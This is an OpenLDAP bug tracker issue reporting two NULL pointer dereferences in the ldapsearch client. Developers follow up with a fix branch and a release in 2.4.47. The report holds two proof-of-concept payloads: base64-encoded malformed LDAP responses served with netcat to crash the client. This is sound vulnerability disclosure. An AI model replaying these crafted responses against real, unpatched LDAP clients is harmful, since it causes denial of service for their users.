Issue 8842 - NULL pointer derefence
Summary: NULL pointer derefence
Status: VERIFIED FIXED
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd (show other issues)
Version: unspecified
Hardware: All All
: --- normal
Target Milestone: ---
Assignee: OpenLDAP project
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-05-01 20:14 UTC by openldap@katzen.cc
Modified: 2018-12-19 17:22 UTC (History)
0 users

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this issue.
Description openldap@katzen.cc 2018-05-01 20:14:50 UTC 
Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or mitm attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simoke DoS.

echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL
b2JqZWN0Y2xhc3MwADCBiQIBAmSBgwQRZGM9ZXhhbXBsZSxkYz1jb20wbjAnBAtvYmplY3RDbGFz
czEYBAhkY09iamVjdAQMb3JnYW5pemF0aW9uMA8EAmRjMQkEB2V4YW1wbGUwDgQBbzEJBAdFeGFt
cGxlMCIEC2Rlc2NyaXB0aW9uMRMEEUV4YW1wbGUgZGlyZWN0b3J5MHkCAQJkdAQZY249cm9vdCxk
Yz1leGFtcGxlLGRjPWNvbTBXMCMEC29iamVjdENsYXNzMRQEEm9yZ2FuaXphdGlvbmFsUm9sZTAM
BAJjbjEGBARyb290MCIEC2Rlc2NyaXB0aW9uMRMEEURpcmVjdG9yeSBNYW5hZ2VyMIIBcAIBAmSC
AWkEGnVpZD1hZGFtLGRjPWV4YW1wbGUsZGM9Y29tMIIBSTA6BAtvYmplY3RDbGFzczErBAN0b3AE
B2FjY291bnQEDHBvc2l4QWNjb3VudAQNc2hhZG93QWNjb3VudDAMBAJjbjEGBARhZGFtMA0EA3Vp
ZDEGBARhZGFtMBQECXVpZE51bWJlcjEHBAUxNjg1OTASBAlnaWROdW1iZXIxBQQDMTAwMB0EDWhv
bWVEaXJlY3RvcnkxDAQKL2hvbWUvYWRhbTAZBApsb2dpblNoZWxsMQsECS9iaW4vYmFzaDAPBAVn
ZWNvczEGBARhZGFtMBcEEHNoYWRvd0xhc3RDaGFuZ2UxAwQBMDAQBAlzaGFkb3dNYXgxAwQBMDAU
BA1zaGFkb3dXYXJuaW5nMQMEATAwOAQMdXNlclBhc3N3b3JkMSgEJntTU0hBfXMzdWIwNnpCNVd2
UmVUZFZPOEVRelRMWVhvSFRCWGVNMAwCAQJlBwoBAAQABAA=" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
 case LDAP_RES_INTERMEDIATE:
                                npartial++;
                                ldap_parse_intermediate( ld, msg,
                                        &retoid, &retdata, NULL, 0 );
                                nresponses_psearch = 0;
			if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is
called. 





Another NULL pointer dereference caused by a bad response:

echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh
c3MxGAQIZGNPYmplY3QEDG9yZ2FuaXphdGlvbjAPBAJkYzEJBAdleGFtcGxlMA4EAW8xCQQHRXhh
bXBsZTAiBAtkZXNjcmlwdGlvbjETBBFFeGFtcGxlIGRpcmVjdG9yeTB5AgECZHQEGWNuPXJvb3Qs
ZGM9ZXhhbXBsZSxkYz1jb20wVzAjBAtvYmplY3RDbGFzczEUBBJvcmdhbml6YXRpb25hbFJvbGUw
DAQCY24xBgQEcm9vdDAiBAtkZXNjcmlwdGlvbjETBBFEaXJlY3RvcnkgTWFuYWdlcjCCAXACAQJk
ggFpBBp1aWQ9YWRhbSxkYz1leGFtcGxlLGRjPWNvbTCCAUkwOgQLb2JqZWN0Q2xhc3MxKwQDdG9w
BAdhY2NvdW50BAxwb3NpeEFjY291bnQEDXNoYWRvd0FjY291bnQwDAQCY24xBgQEYWRhbTANBAN1
aWQxBgQEYWRhbTAUBAl1aWROdW1iZXIxBwQFMTY4NTkwEgQJZ2lkTnVtYmVyMQUEAzEwMDAdBA1o
b21lRGlyZWN0b3J5MQwECi9ob21lL2FkYW0wGQQKbG9naW5TaGVsbDELBAkvYmluL2Jhc2gwDwQF
Z2Vjb3MxBgQEYWRhbTAXBBBzaGFkb3dMYXN0Q2hhbmdlMQMEATAwEAQJc2hhZG93TWF4MQMEATAw
FAQNc2hhZG93V2FybmluZzEDBAEwMDgEDHVzZXJQYXNzd29yZDEoBCZ7U1NIQX1zM3ViMDZ6QjVX
dlJlVGRWTzhFUXpUTFlYb0hUQlhlTTAMAgECZQcKAQAEAAQA" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);
Comment 1 Ondřej Kuzník 2018-06-21 15:29:24 UTC 
On Tue, May 01, 2018 at 08:14:50PM +0000, openldap@katzen.cc wrote:
> 2 small issues:
> I'm keeping it brief, let me know if you need more information.
> 
> A malicious LDAP server or mitm attacker can craft a response that causes the
> ldap client to crash. Nothing critical, just a simoke DoS.
> [...]
> The problem here is that retoid can be NULL after ldap_parse_intermediate() is
> called. 
>
> Another NULL pointer dereference caused by a bad response:
> [...]
> The PoC leads to memcpy being called with a NULL pointer as second argument
> (ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):
> 
> AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);

Both are fixed in this branch:
https://github.com/mistotebe/openldap/tree/its8842

-- 
Ondřej Kuzník
Senior Software Engineer
Symas Corporation                       http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP
Comment 2 Quanah Gibson-Mount 2018-07-09 17:06:24 UTC 
changed notes
changed state Open to Test
moved from Incoming to Software Bugs
Comment 3 Quanah Gibson-Mount 2018-07-10 13:59:34 UTC 
changed notes
changed state Test to Release
Comment 4 OpenLDAP project 2018-12-19 17:22:17 UTC 
Fixed in master
Fixed in RE24 (2.4.47)
Comment 5 Quanah Gibson-Mount 2018-12-19 17:22:17 UTC 
changed notes
changed state Release to Closed